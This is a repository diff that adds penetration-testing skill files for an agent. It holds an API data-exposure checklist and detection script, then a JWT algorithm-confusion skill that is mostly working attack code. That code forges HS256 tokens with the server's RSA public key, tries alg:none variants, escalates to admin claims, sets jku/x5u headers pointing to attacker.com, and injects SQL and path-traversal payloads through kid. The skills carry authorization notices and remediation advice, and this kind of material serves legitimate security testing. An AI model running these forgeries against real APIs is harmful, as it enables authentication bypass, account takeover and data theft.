+| **Schema Validation** | Enforcing that API responses conform to a defined schema, stripping unauthorized fields before transmission |
+
+## Tools & Systems
+
+- **Burp Suite Professional**: Intercept API responses and use the Comparer tool to diff expected vs actual response schemas
+- **mitmproxy**: Scriptable proxy for automated response analysis with Python-based content inspection scripts
+- **OWASP ZAP**: Passive scanner detects information disclosure in headers, error messages, and response bodies
+- **Postman**: Compare documented response schemas against actual API responses using test scripts
+- **jq**: Command-line JSON processor for extracting and analyzing specific fields from API responses
+
+## Common Scenarios
+
+### Scenario: Mobile Banking API Data Exposure Assessment
+
+**Context**: A mobile banking application's API returns full account objects to the mobile client, which only displays account nickname and balance. The API is accessed by both iOS and Android apps and a web portal.
+
+**Approach**:
+1. Configure mitmproxy on a test device and authenticate as the test user
+2. Capture all API responses during a complete user session (login, view accounts, transfer, logout)
+3. Analyze `GET /api/v1/accounts` response: UI shows 4 fields but API returns 23 fields
+4. Discover that the API returns `routing_number`, `account_holder_ssn_last4`, `internal_risk_score`, `kyc_verification_status`, and `linked_external_accounts` - none shown in UI
+5. Analyze `GET /api/v1/transactions` response: API returns `merchant_id`, `terminal_id`, `authorization_code`, `processor_response` fields not needed by the client
+6. Check `GET /api/v1/users/me`: API returns `last_login_ip`, `mfa_backup_codes_remaining`, `account_officer_name`, and `credit_score_band`
+7. Test error responses: `POST /api/v1/transfers` with invalid payload returns SQL table name in error message
+
+**Pitfalls**:
+- Only checking top-level fields and missing sensitive data in deeply nested objects
+- Not testing paginated responses where subsequent pages may include different fields
+- Ignoring response headers that may leak server version, backend technology, or internal routing information
+- Missing data exposure in error responses which often contain stack traces, SQL queries, or internal paths
+- Assuming that HTTPS encryption prevents data exposure (it protects in transit, not from the authenticated client)
+
+## Output Format
+
+```
+## Finding: Excessive Data Exposure in Account and Transaction APIs
+
+**ID**: API-DATA-001
+**Severity**: High (CVSS 7.1)
+**OWASP API**: API3:2023 - Broken Object Property Level Authorization
+**Affected Endpoints**:
+  - GET /api/v1/accounts
+  - GET /api/v1/transactions
+  - GET /api/v1/users/me
+
+**Description**:
+The API returns full database objects to the client, including sensitive fields
+that are not displayed in the mobile application UI. The mobile app filters
+these fields client-side, but they are fully accessible by intercepting the
+API response. This exposes SSN fragments, internal risk scores, and KYC
+verification data for any authenticated user.
+
+**Excess Fields Discovered**:
+- /accounts: routing_number, account_holder_ssn_last4, internal_risk_score,
+  kyc_verification_status, linked_external_accounts (18 excess fields total)
+- /transactions: merchant_id, terminal_id, authorization_code,
+  processor_response (12 excess fields total)
+- /users/me: last_login_ip, mfa_backup_codes_remaining, credit_score_band
+
+**Impact**:
+An authenticated user can extract sensitive financial data, internal risk
+assessments, and PII for their own account that the application is not
+intended to reveal. Combined with BOLA vulnerabilities, this data could
+be extracted for all users.
+
+**Remediation**:
+1. Implement server-side response filtering using DTOs/view models that only include fields needed by the client
+2. Use GraphQL field-level authorization or REST response schemas per endpoint per role
+3. Remove sensitive fields from API responses at the serialization layer
+4. Implement response schema validation in the API gateway to strip undocumented fields
+5. Add automated tests that verify response schemas match documentation
+```

--- a/security/skills/exploiting-excessive-data-exposure-in-api/references/api-reference.md
+++ b/security/skills/exploiting-excessive-data-exposure-in-api/references/api-reference.md
@@ -1,0 +1,81 @@
+# API Reference: Excessive Data Exposure (OWASP API3)
+
+## OWASP API3:2023 — Broken Object Property Level Authorization
+
+### Description
+API returns more data than the client needs. Sensitive fields like passwords,
+tokens, internal IDs, or PII are included in responses without filtering.
+
+## Sensitive Field Categories
+
+| Category | Examples |
+|----------|----------|
+| Credentials | password, secret, token, api_key |
+| PII | ssn, date_of_birth, credit_card |
+| Internal | internal_id, debug_info, stack_trace |
+| Financial | salary, bank_account, routing_number |
+
+## PII Detection Regex Patterns
+
+| Type | Pattern |
+|------|---------|
+| Email | `[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}` |
+| SSN | `\d{3}-\d{2}-\d{4}` |
+| Credit Card | `\d{4}[-\s]?\d{4}[-\s]?\d{4}[-\s]?\d{4}` |
+| Phone | `\+?1?\d{10,15}` |
+| IP Address | `\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}` |
+
+## Testing Methodology
+
+### Step 1: Compare Response to Documentation
+```bash
+# Get actual response
+curl -s https://api.target.com/users/me | jq 'keys'
+
+# Compare with OpenAPI spec expected fields
+```
+
+### Step 2: Check for Sensitive Fields
+```python
+sensitive = ["password", "token", "ssn", "secret"]
+for field in response_json:
+    if any(s in field.lower() for s in sensitive):
+        print(f"EXPOSED: {field}")
+```
+
+### Step 3: Test Different Roles
+```bash
+# As regular user, check if admin fields returned
+curl -H "Authorization: Bearer $USER_TOKEN" \
+     https://api.target.com/users/123 | jq '.role, .permissions'
+```
+
+## Python requests
+
+### Fetch and Analyze
+```python
+resp = requests.get(url, headers={"Authorization": f"Bearer {token}"})
+data = resp.json()
+```
+
+## Remediation Approaches
+
+| Approach | Description |
+|----------|-------------|
+| Response filtering | Only return fields client needs |
+| GraphQL field selection | Let client specify fields |
+| View models / DTOs | Map internal model to public API |
+| Role-based serialization | Different fields per role |
+
+## Tools
+
+### Postman Collection Runner
+Automate response schema validation across endpoints.
+
+### OWASP ZAP — Passive Scanner
+Detects sensitive data in responses automatically.
+
+### Swagger/OpenAPI Diff
+```bash
+openapi-diff expected-spec.yaml actual-responses.yaml
+```

--- a/security/skills/exploiting-excessive-data-exposure-in-api/scripts/agent.py
+++ b/security/skills/exploiting-excessive-data-exposure-in-api/scripts/agent.py
@@ -1,0 +1,162 @@
+#!/usr/bin/env python3
+# For authorized penetration testing and educational environments only.
+# Usage against targets without prior mutual consent is illegal.
+# It is the end user's responsibility to obey all applicable local, state and federal laws.
+"""Agent for detecting excessive data exposure (OWASP API3) in API responses."""
+
+import argparse
+import json
+import re
+from datetime import datetime, timezone
+
+try:
+    import requests
+    HAS_REQUESTS = True
+except ImportError:
+    HAS_REQUESTS = False
+
+SENSITIVE_FIELDS = [
+    "password", "passwd", "secret", "token", "api_key", "apikey",
+    "ssn", "social_security", "credit_card", "card_number", "cvv",
+    "private_key", "secret_key", "access_key", "session_id",
+    "internal_id", "salary", "bank_account", "routing_number",
+    "date_of_birth", "dob", "national_id", "passport",
+]
+
+PII_PATTERNS = {
+    "email": r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}',
+    "phone": r'\+?1?\d{10,15}',
+    "ssn": r'\d{3}-\d{2}-\d{4}',
+    "credit_card": r'\d{4}[-\s]?\d{4}[-\s]?\d{4}[-\s]?\d{4}',
+    "ip_address": r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}',
+}
+
+
+def analyze_response(response_json, endpoint=""):
+    """Analyze API response for excessive data exposure."""
+    findings = []
+
+    def check_fields(obj, path=""):
+        if isinstance(obj, dict):
+            for key, value in obj.items():
+                current_path = f"{path}.{key}" if path else key
+                key_lower = key.lower()
+                for sf in SENSITIVE_FIELDS:
+                    if sf in key_lower:
+                        findings.append({
+                            "field": current_path,
+                            "matched_pattern": sf,
+                            "value_type": type(value).__name__,
+                            "value_preview": str(value)[:20] + "..." if len(str(value)) > 20 else str(value),
+                            "severity": "HIGH",
+                        })
+                        break
+                check_fields(value, current_path)
+        elif isinstance(obj, list):
+            for i, item in enumerate(obj[:5]):
+                check_fields(item, f"{path}[{i}]")
+
+    check_fields(response_json)
+
+    response_str = json.dumps(response_json)
+    for pattern_name, pattern in PII_PATTERNS.items():
+        matches = re.findall(pattern, response_str)
+        if matches:
+            findings.append({
+                "type": "pii_exposure",
+                "pattern": pattern_name,
+                "match_count": len(matches),
+                "samples": matches[:3],
+                "severity": "HIGH",
+            })
+    return findings
+
+
+def test_endpoint(url, headers=None):
+    """Fetch API endpoint and analyze for data exposure."""
+    if not HAS_REQUESTS:
+        return {"error": "requests library not available"}
+    try:
+        resp = requests.get(url, headers=headers, timeout=15, verify=False)
+        data = resp.json()
+        field_count = count_fields(data)
+        findings = analyze_response(data, url)
+        return {
+            "endpoint": url,
+            "status_code": resp.status_code,
+            "total_fields": field_count,
+            "sensitive_fields": len(findings),
+            "findings": findings,
+        }
+    except (requests.RequestException, json.JSONDecodeError) as e:
+        return {"endpoint": url, "error": str(e)[:200]}
+
+
+def count_fields(obj, count=0):
+    """Count total fields in a JSON response."""
+    if isinstance(obj, dict):
+        count += len(obj)
+        for v in obj.values():
+            count = count_fields(v, count)
+    elif isinstance(obj, list):
+        for item in obj[:10]:
+            count = count_fields(item, count)
+    return count
+
+
+def compare_with_spec(response_json, spec_fields):
+    """Compare response fields against expected OpenAPI spec fields."""
+    actual = set()
+
+    def extract_keys(obj, prefix=""):
+        if isinstance(obj, dict):
+            for k in obj:
+                path = f"{prefix}.{k}" if prefix else k
+                actual.add(path)
+                extract_keys(obj[k], path)
+
+    extract_keys(response_json)
+    extra = actual - set(spec_fields)
+    return list(extra)
+
+
+def main():
+    parser = argparse.ArgumentParser(
+        description="Detect excessive data exposure in API responses"
+    )
+    parser.add_argument("--url", help="API endpoint to test")
+    parser.add_argument("--json-file", help="JSON response file to analyze")
+    parser.add_argument("--token", help="Bearer token for auth")
+    parser.add_argument("--output", "-o", help="Output JSON report")
+    args = parser.parse_args()
+
+    print("[*] Excessive Data Exposure Detection Agent (OWASP API3)")
+    report = {"timestamp": datetime.now(timezone.utc).isoformat(), "findings": []}
+
+    if args.url:
+        headers = {"Authorization": f"Bearer {args.token}"} if args.token else {}
+        result = test_endpoint(args.url, headers)
+        report["findings"].append(result)
+        print(f"[*] {args.url}: {result.get('sensitive_fields', 0)} sensitive fields found")
+
+    if args.json_file:
+        with open(args.json_file, "r") as f:
+            data = json.load(f)
+        findings = analyze_response(data, args.json_file)
+        report["findings"].extend(findings)
+        print(f"[*] File analysis: {len(findings)} sensitive fields found")
+
+    report["risk_level"] = "HIGH" if any(
+        f.get("sensitive_fields", 0) > 0 or f.get("severity") == "HIGH" for f in report["findings"]
+    ) else "LOW"
+
+    if args.output:
+        with open(args.output, "w") as f:
+            json.dump(report, f, indent=2)
+        print(f"[*] Report saved to {args.output}")
+    else:
+        print(json.dumps(report, indent=2))
+
+
+if __name__ == "__main__":
+    main()

--- a/security/skills/exploiting-jwt-algorithm-confusion-attack/SKILL.md
+++ b/security/skills/exploiting-jwt-algorithm-confusion-attack/SKILL.md
@@ -1,0 +1,472 @@
+---
+name: exploiting-jwt-algorithm-confusion-attack
+description: 'Exploits JWT algorithm confusion vulnerabilities where the server''s
+  token verification library accepts the algorithm specified in the JWT header rather
+  than enforcing a fixed algorithm. The tester manipulates the alg header to switch
+  from RS256 to HS256 (using the RSA public key as the HMAC secret), sets alg to none
+  to bypass signature verification, or exploits kid/jku/x5u header injection to supply
+  attacker-controlled keys. Activates for requests involving JWT algorithm confusion,
+  alg none attack, key confusion attack, or JWT signature bypass.
+
+  '
+domain: cybersecurity
+subdomain: api-security
+tags:
+- api-security
+- jwt
+- algorithm-confusion
+- token-forgery
+- cryptographic-attack
+version: 1.0.0
+author: mahipal
+license: Apache-2.0
+nist_csf:
+- PR.PS-01
+- ID.RA-01
+- PR.DS-10
+- DE.CM-01
+mitre_attack:
+- T1190
+- T1059.007
+- T1552.001
+- T1055
+- T1059
+---
+# Exploiting JWT Algorithm Confusion Attack
+
+## When to Use
+
+- Testing APIs that use RS256 (asymmetric) JWT tokens for authentication to check for algorithm downgrade to HS256
+- Assessing JWT implementations for alg:none bypass where the server skips signature verification
+- Evaluating JWT libraries for key confusion vulnerabilities where the public key is used as HMAC secret
+- Testing kid (Key ID), jku (JWK Set URL), and x5u (X.509 URL) header parameters for injection
+- Validating that the API server enforces a specific algorithm and does not trust the JWT header
+
+**Do not use** without written authorization. JWT exploitation can lead to authentication bypass and account takeover.
+
+## Prerequisites
+
+- Written authorization specifying the target API and JWT-based authentication in scope
+- A valid JWT token from the target API (obtained through legitimate authentication)
+- The server's RSA public key (obtainable from JWKS endpoint, TLS certificate, or public key endpoint)
+- Python 3.10+ with `PyJWT`, `cryptography`, and `requests` libraries
+- jwt_tool for automated JWT attack testing
+- Burp Suite with JWT Editor extension
+
+
+> **Legal Notice:** This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.
+
+## Workflow
+
+### Step 1: JWT Token Analysis
+
+```python
+import base64
+import json
+import requests
+import hmac
+import hashlib
+import time
+
+BASE_URL = "https://target-api.example.com/api/v1"
+
+# Capture a valid JWT token
+login_resp = requests.post(f"{BASE_URL}/auth/login",
+    json={"email": "test@example.com", "password": "TestPass123!"})
+valid_token = login_resp.json().get("access_token", "")
+
+# Decode JWT parts
+def decode_jwt(token):
+    parts = token.split('.')
+    if len(parts) != 3:
+        raise ValueError("Invalid JWT format")
+
+    def pad(s):
+        return s + '=' * (4 - len(s) % 4)
+
+    header = json.loads(base64.urlsafe_b64decode(pad(parts[0])))
+    payload = json.loads(base64.urlsafe_b64decode(pad(parts[1])))
+    return header, payload, parts[2]
+
+header, payload, signature = decode_jwt(valid_token)
+print(f"Algorithm: {header.get('alg')}")
+print(f"Key ID: {header.get('kid', 'none')}")
+print(f"Type: {header.get('typ')}")
+print(f"JKU: {header.get('jku', 'none')}")
+print(f"\nPayload: {json.dumps(payload, indent=2)}")
+print(f"\nExpires: {time.ctime(payload.get('exp', 0))}")
+```
+
+### Step 2: Obtain the Public Key
+
+```python
+from cryptography.hazmat.primitives import serialization
+from cryptography.x509 import load_pem_x509_certificate
+
+# Method 1: JWKS endpoint
+jwks_url = f"{BASE_URL}/.well-known/jwks.json"
+jwks_resp = requests.get(jwks_url)
+if jwks_resp.status_code == 200:
+    jwks = jwks_resp.json()
+    print(f"JWKS keys found: {len(jwks.get('keys', []))}")
+    for key in jwks['keys']:
+        print(f"  kid: {key.get('kid')}, kty: {key.get('kty')}, alg: {key.get('alg')}")
+
+    # Extract RSA public key from JWKS
+    from cryptography.hazmat.primitives.asymmetric.rsa import RSAPublicNumbers
+    from cryptography.hazmat.backends import default_backend
+
+    rsa_key = jwks['keys'][0]  # First key
+    n = int.from_bytes(base64.urlsafe_b64decode(rsa_key['n'] + '=='), 'big')
+    e = int.from_bytes(base64.urlsafe_b64decode(rsa_key['e'] + '=='), 'big')
+    public_key = RSAPublicNumbers(e, n).public_key(default_backend())
+    public_key_pem = public_key.public_bytes(
+        encoding=serialization.Encoding.PEM,
+        format=serialization.PublicFormat.SubjectPublicKeyInfo
+    )
+    print(f"\nPublic Key (PEM):\n{public_key_pem.decode()}")
+
+# Method 2: From well-known OpenID configuration
+oidc_resp = requests.get(f"{BASE_URL}/.well-known/openid-configuration")
+if oidc_resp.status_code == 200:
+    jwks_uri = oidc_resp.json().get('jwks_uri')
+    print(f"JWKS URI from OIDC config: {jwks_uri}")
+
+# Method 3: Exposed at common paths
+for path in ["/public-key", "/api/public-key", "/oauth/token_key", "/.well-known/jwks"]:
+    resp = requests.get(f"{BASE_URL}{path}")
+    if resp.status_code == 200 and ("BEGIN" in resp.text or "keys" in resp.text):
+        print(f"Public key found at: {path}")
+```
+
+### Step 3: Algorithm Confusion Attack (RS256 to HS256)
+
+```python
+def forge_hs256_with_public_key(token, public_key_pem, modifications=None):
+    """
+    Algorithm confusion: Sign token with HS256 using the RSA public key as secret.
+    If the server uses a generic verify() that trusts the alg header, it will use
+    the public key as the HMAC secret, matching our signature.
+    """
+    parts = token.split('.')
+    payload = json.loads(base64.urlsafe_b64decode(parts[1] + '=='))
+
+    # Modify payload if requested
+    if modifications:
+        payload.update(modifications)
+
+    # Create header with HS256
+    new_header = {"alg": "HS256", "typ": "JWT"}
+
+    # Encode header and payload
+    header_b64 = base64.urlsafe_b64encode(
+        json.dumps(new_header).encode()).decode().rstrip('=')
+    payload_b64 = base64.urlsafe_b64encode(
+        json.dumps(payload).encode()).decode().rstrip('=')
+
+    # Sign with HMAC-SHA256 using the RSA public key as the secret
+    signing_input = f"{header_b64}.{payload_b64}".encode()
+
+    # Use the raw PEM bytes as the HMAC key
+    if isinstance(public_key_pem, str):
+        public_key_pem = public_key_pem.encode()
+
+    signature = hmac.new(public_key_pem, signing_input, hashlib.sha256).digest()
+    sig_b64 = base64.urlsafe_b64encode(signature).decode().rstrip('=')
+
+    return f"{header_b64}.{payload_b64}.{sig_b64}"
+
+# Attack 1: Algorithm confusion with same claims
+confused_token = forge_hs256_with_public_key(valid_token, public_key_pem)
+resp = requests.get(f"{BASE_URL}/users/me",
+    headers={"Authorization": f"Bearer {confused_token}"})
+print(f"Algorithm confusion (same claims): {resp.status_code}")
+if resp.status_code == 200:
+    print("[CRITICAL] Algorithm confusion attack successful - RS256 to HS256")
+
+# Attack 2: Algorithm confusion with elevated privileges
+admin_token = forge_hs256_with_public_key(valid_token, public_key_pem,
+    modifications={"role": "admin", "sub": "admin@example.com"})
+resp = requests.get(f"{BASE_URL}/admin/users",
+    headers={"Authorization": f"Bearer {admin_token}"})
+print(f"Algorithm confusion (admin): {resp.status_code}")
+if resp.status_code == 200:
+    print("[CRITICAL] Admin access via algorithm confusion + claim manipulation")
+
+# Attack 3: Try different public key formats
+key_formats = [
+    public_key_pem,                                    # Full PEM
+    public_key_pem.strip(),                            # Stripped whitespace
+    public_key_pem.replace(b'\n', b''),               # No newlines
+    public_key_pem.decode().split('\n')[1:-1],        # Base64 only
+]
+
+for i, key_format in enumerate(key_formats):
+    if isinstance(key_format, list):
+        key_format = ''.join(key_format).encode()
+    elif isinstance(key_format, str):
+        key_format = key_format.encode()
+
+    token = forge_hs256_with_public_key(valid_token, key_format)
+    resp = requests.get(f"{BASE_URL}/users/me",
+        headers={"Authorization": f"Bearer {token}"})
+    if resp.status_code == 200:
+        print(f"[CRITICAL] Key format {i} worked for algorithm confusion")
+```
+
+### Step 4: Algorithm None Attack
+
+```python
+def forge_none_algorithm(token, modifications=None):
+    """Create tokens with alg:none variations to bypass signature verification."""
+    parts = token.split('.')
+    payload = json.loads(base64.urlsafe_b64decode(parts[1] + '=='))
+
+    if modifications:
+        payload.update(modifications)
+
+    payload_b64 = base64.urlsafe_b64encode(
+        json.dumps(payload).encode()).decode().rstrip('=')
+
+    # Different "none" algorithm variations
+    none_variants = [
+        {"alg": "none", "typ": "JWT"},
+        {"alg": "None", "typ": "JWT"},
+        {"alg": "NONE", "typ": "JWT"},
+        {"alg": "nOnE", "typ": "JWT"},
+        {"typ": "JWT"},  # Missing alg entirely
+    ]
+
+    tokens = []
+    for variant_header in none_variants:
+        header_b64 = base64.urlsafe_b64encode(
+            json.dumps(variant_header).encode()).decode().rstrip('=')
+
+        # Different signature options
+        sig_options = [
+            "",                    # Empty signature
+            ".",                   # Just a dot
+            parts[2],             # Original signature
+            base64.urlsafe_b64encode(b'\x00').decode().rstrip('='),  # Null byte
+        ]
+
+        for sig in sig_options:
+            tokens.append(f"{header_b64}.{payload_b64}.{sig}")
+
+    return tokens
+
+# Test all none algorithm variations
+none_tokens = forge_none_algorithm(valid_token)
+for i, token in enumerate(none_tokens):
+    resp = requests.get(f"{BASE_URL}/users/me",
+        headers={"Authorization": f"Bearer {token}"})
+    if resp.status_code == 200:
+        header = json.loads(base64.urlsafe_b64decode(token.split('.')[0] + '=='))
+        print(f"[CRITICAL] alg:none bypass #{i}: header={header}, sig_len={len(token.split('.')[2])}")
+
+# Test with privilege escalation
+admin_none_tokens = forge_none_algorithm(valid_token,
+    modifications={"role": "admin", "is_admin": True})
+for token in admin_none_tokens:
+    resp = requests.get(f"{BASE_URL}/admin/users",
+        headers={"Authorization": f"Bearer {token}"})
+    if resp.status_code == 200:
+        print("[CRITICAL] Admin access via alg:none bypass")
+        break
+```
+
+### Step 5: JKU and KID Header Injection
+
+```python
+import os
+
+# Attack: JKU (JWK Set URL) injection
+# Host attacker-controlled JWKS that contains our key pair
+def generate_attacker_jwks():
+    """Generate an RSA key pair and JWKS for the attacker's server."""
+    from cryptography.hazmat.primitives.asymmetric import rsa
+    from cryptography.hazmat.backends import default_backend
+
+    # Generate attacker key pair
+    private_key = rsa.generate_private_key(
+        public_exponent=65537,
+        key_size=2048,
+        backend=default_backend()
+    )
+    public_key = private_key.public_key()
+    public_numbers = public_key.public_numbers()
+
+    n_b64 = base64.urlsafe_b64encode(
+        public_numbers.n.to_bytes(256, 'big')).decode().rstrip('=')
+    e_b64 = base64.urlsafe_b64encode(
+        public_numbers.e.to_bytes(3, 'big')).decode().rstrip('=')
+
+    jwks = {
+        "keys": [{
+            "kty": "RSA",
+            "kid": "attacker-key-1",
+            "use": "sig",
+            "alg": "RS256",
+            "n": n_b64,
+            "e": e_b64
+        }]
+    }
+
+    return private_key, jwks
+
+attacker_private_key, attacker_jwks = generate_attacker_jwks()
+
+# Create JWT with JKU pointing to attacker server
+def forge_jku_token(payload_modifications, jku_url):
+    """Create a JWT signed with attacker key, JKU pointing to attacker JWKS."""
+    payload = json.loads(base64.urlsafe_b64decode(valid_token.split('.')[1] + '=='))
+    payload.update(payload_modifications)
+
+    header = {
+        "alg": "RS256",
+        "typ": "JWT",
+        "kid": "attacker-key-1",
+        "jku": jku_url  # Points to attacker-hosted JWKS
+    }
+
+    header_b64 = base64.urlsafe_b64encode(
+        json.dumps(header).encode()).decode().rstrip('=')
+    payload_b64 = base64.urlsafe_b64encode(
+        json.dumps(payload).encode()).decode().rstrip('=')
+
+    # Sign with attacker's private key
+    from cryptography.hazmat.primitives import hashes
+    from cryptography.hazmat.primitives.asymmetric import padding
+
+    signing_input = f"{header_b64}.{payload_b64}".encode()
+    signature = attacker_private_key.sign(
+        signing_input,
+        padding.PKCS1v15(),
+        hashes.SHA256()
+    )
+    sig_b64 = base64.urlsafe_b64encode(signature).decode().rstrip('=')
+
+    return f"{header_b64}.{payload_b64}.{sig_b64}"
+
+# Test JKU injection with various URLs
+jku_urls = [
+    "https://attacker.com/.well-known/jwks.json",
+    "https://attacker.com/jwks",
+    # Bypass URL filters
+    f"{BASE_URL}@attacker.com/jwks",
+    f"{BASE_URL}/.well-known/jwks.json#@attacker.com",
+]
+
+for jku in jku_urls:
+    token = forge_jku_token({"role": "admin"}, jku)
+    # Note: This test requires hosting the attacker JWKS at the specified URL
+    print(f"  JKU injection payload generated for: {jku}")
+
+# KID injection (SQL injection in kid parameter)
+kid_injection_payloads = [
+    "../../../../../../dev/null",              # Path traversal to empty file
+    "../../../../../../proc/sys/kernel/hostname",
+    "' UNION SELECT 'secret-key' -- ",         # SQL injection in kid lookup
+    "' OR '1'='1",
+    "../../../etc/passwd",
+    "https://attacker.com/key.pem",            # URL-based kid
+]
+
+for kid in kid_injection_payloads:
+    modified_header = {"alg": "HS256", "typ": "JWT", "kid": kid}
+    header_b64 = base64.urlsafe_b64encode(
+        json.dumps(modified_header).encode()).decode().rstrip('=')
+    payload_b64 = valid_token.split('.')[1]
+
+    # Sign with the expected key material from the injection
+    signing_input = f"{header_b64}.{payload_b64}".encode()
+    # For path traversal to /dev/null, the key would be empty
+    sig = hmac.new(b"", signing_input, hashlib.sha256).digest()
+    sig_b64 = base64.urlsafe_b64encode(sig).decode().rstrip('=')
+
+    token = f"{header_b64}.{payload_b64}.{sig_b64}"
+    resp = requests.get(f"{BASE_URL}/users/me",
+        headers={"Authorization": f"Bearer {token}"})
+    if resp.status_code == 200:
+        print(f"[CRITICAL] KID injection successful: {kid}")
+```
+
+## Key Concepts
+
+| Term | Definition |
+|------|------------|
+| **Algorithm Confusion** | Attack where the server trusts the alg header in the JWT, allowing an attacker to switch from RS256 to HS256 and sign with the public key as the HMAC secret |
+| **alg:none Attack** | Setting the JWT algorithm to "none" to bypass signature verification entirely, if the library does not enforce algorithm selection |
+| **JKU Injection** | Manipulating the jku (JWK Set URL) header to point to an attacker-controlled JWKS endpoint, allowing the attacker to supply their own signing keys |
+| **KID Injection** | Injecting SQL, path traversal, or URL payloads into the kid (Key ID) header parameter to manipulate key selection or read arbitrary files |
+| **Key Confusion** | Using the RSA public key as the HMAC secret when the server incorrectly switches from asymmetric to symmetric verification |
+| **JWKS (JSON Web Key Set)** | A JSON structure containing the public keys used by the server to verify JWT signatures, typically hosted at a well-known endpoint |
+
+## Tools & Systems
+
+- **jwt_tool**: Python-based JWT testing toolkit with 12+ attack modes including alg confusion, none bypass, and kid injection
+- **Burp Suite JWT Editor**: Extension for decoding, editing, and re-signing JWTs with algorithm manipulation capabilities
+- **hashcat (mode 16500)**: GPU-accelerated HMAC secret brute-forcing for HS256/HS384/HS512-signed JWTs
+- **John the Ripper**: CPU-based JWT secret cracking with wordlist and rule-based attacks
+- **jwt.io**: Online JWT decoder and debugger for quick token analysis
+
+## Common Scenarios
+
+### Scenario: Algorithm Confusion on Banking API
+
+**Context**: A banking API uses RS256-signed JWTs for authentication. The JWKS endpoint is publicly accessible. The API handles financial transactions requiring high assurance authentication.
+
+**Approach**:
+1. Obtain a valid JWT by authenticating as a regular user
+2. Extract the RSA public key from the JWKS endpoint at `/.well-known/jwks.json`
+3. Create a new JWT with `"alg": "HS256"` header and sign it using the RSA public key as the HMAC secret
+4. Send the forged token to `GET /api/v1/users/me` - server accepts it (algorithm confusion confirmed)
+5. Modify the payload to set `"role": "admin"` and `"sub": "admin@bank.com"` - sign with the public key
+6. Access admin endpoints: `GET /api/v1/admin/transactions` returns all transaction history
+7. Test alg:none: rejected by the server (partial mitigation)
+8. Test kid injection with SQL payload: kid parameter is used in a SQL query to look up keys, enabling SQL injection
+
+**Pitfalls**:
+- Using the wrong format of the public key as the HMAC secret (PEM with/without headers, DER, raw bytes)
+- Not trying multiple public key formats when the first one does not produce a valid signature
+- Assuming the alg:none defense means algorithm confusion is also mitigated
+- Not testing kid injection vectors when the kid parameter is present in the JWT header
+- Missing JKU/x5u header injection when the server fetches keys from URLs
+
+## Output Format
+
+```
+## Finding: JWT Algorithm Confusion Enables Authentication Bypass
+
+**ID**: API-JWT-001
+**Severity**: Critical (CVSS 9.8)
+**CVE Reference**: CVE-2024-54150 (related pattern)
+**Affected Component**: JWT authentication middleware
+
+**Description**:
+The API's JWT verification library trusts the algorithm specified in
+the JWT header rather than enforcing a fixed algorithm. An attacker can
+change the algorithm from RS256 to HS256 and sign the token using the
+server's RSA public key (available from the JWKS endpoint) as the HMAC
+secret. The server then uses the same public key to verify the HMAC
+signature, which succeeds, allowing the attacker to forge tokens for
+any user with any role.
+
+**Attack Chain**:
+1. Obtain public key: GET /.well-known/jwks.json
+2. Create JWT: {"alg":"HS256","typ":"JWT"}.{"sub":"admin","role":"admin"}
+3. Sign with HMAC-SHA256 using RSA public key PEM as secret
+4. Access admin API: GET /api/v1/admin/transactions -> 200 OK
+
+**Impact**:
+Complete authentication bypass. An attacker can forge tokens for any
+user including administrators, accessing all financial transactions,
+user data, and administrative functions.
+
+**Remediation**:
+1. Enforce the expected algorithm at the server configuration level: jwt.verify(token, key, algorithms=["RS256"])
+2. Never trust the alg header from the JWT for algorithm selection
+3. Update the JWT library to the latest version with algorithm confusion protections
+4. Consider using EdDSA (Ed25519) which does not have symmetric/asymmetric confusion risk
+5. Implement token binding to prevent forged token acceptance
+```

--- a/security/skills/exploiting-jwt-algorithm-confusion-attack/references/api-reference.md
+++ b/security/skills/exploiting-jwt-algorithm-confusion-attack/references/api-reference.md
@@ -1,0 +1,99 @@
+# API Reference: JWT Algorithm Confusion Attack
+
+## JWT Structure
+
+### Three parts (dot-separated, Base64URL-encoded)
+```
+<header>.<payload>.<signature>
+```
+
+### Header
+```json
+{"alg": "RS256", "typ": "JWT"}
+```
+
+### Common Algorithms
+| Algorithm | Type | Key |
+|-----------|------|-----|
+| HS256 | HMAC | Symmetric shared secret |
+| RS256 | RSA | Asymmetric key pair |
+| ES256 | ECDSA | Asymmetric key pair |
+| none | None | No signature |
+
+## Algorithm Confusion Attack
+
+### Attack Flow
+1. Server uses RS256 (asymmetric) with public/private key pair
+2. Attacker obtains server's RSA public key
+3. Attacker changes `alg` header from RS256 to HS256
+4. Attacker signs token with the RSA public key as HMAC secret
+5. Server verifies with public key using HMAC (accepts token)
+
+### Forging with Public Key
+```python
+import hmac, hashlib, base64, json
+
+header = base64url(json.dumps({"alg": "HS256", "typ": "JWT"}))
+payload = base64url(json.dumps({"sub": "admin"}))
+signature = hmac.new(public_key_bytes, f"{header}.{payload}", hashlib.sha256)
+token = f"{header}.{payload}.{base64url(signature)}"
+```
+
+## None Algorithm Attack
+
+### Forged Token
+```python
+header = base64url('{"alg":"none","typ":"JWT"}')
+payload = base64url('{"sub":"admin","admin":true}')
+token = f"{header}.{payload}."
+```
+
+## JWT Header Injection Attacks
+
+### JKU (JSON Web Key Set URL)
+```json
+{"alg": "RS256", "jku": "https://attacker.com/.well-known/jwks.json"}
+```
+
+### X5U (X.509 URL)
+```json
+{"alg": "RS256", "x5u": "https://attacker.com/cert.pem"}
+```
+
+### KID (Key ID) — SQL Injection
+```json
+{"alg": "HS256", "kid": "key1' UNION SELECT 'secret'--"}
+```
+
+### KID — Path Traversal
+```json
+{"alg": "HS256", "kid": "../../dev/null"}
+```
+
+## Python PyJWT Library
+
+### Decode without verification
+```python
+import jwt
+decoded = jwt.decode(token, options={"verify_signature": False})
+```
+
+### Verify with algorithm restriction
+```python
+decoded = jwt.decode(token, public_key, algorithms=["RS256"])
+```
+
+## jwt_tool — JWT Testing Tool
+
+### Scan for vulnerabilities
+```bash
+python3 jwt_tool.py <token> -M at    # All tests
+python3 jwt_tool.py <token> -X a     # alg:none attack
+python3 jwt_tool.py <token> -X k -pk public.pem  # Key confusion
+```
+
+## Remediation
+1. Always specify allowed algorithms: `algorithms=["RS256"]`
+2. Never accept `alg: none`
+3. Use separate verification logic for symmetric vs asymmetric
+4. Validate JKU/X5U against allowlist

--- a/security/skills/exploiting-jwt-algorithm-confusion-attack/scripts/agent.py
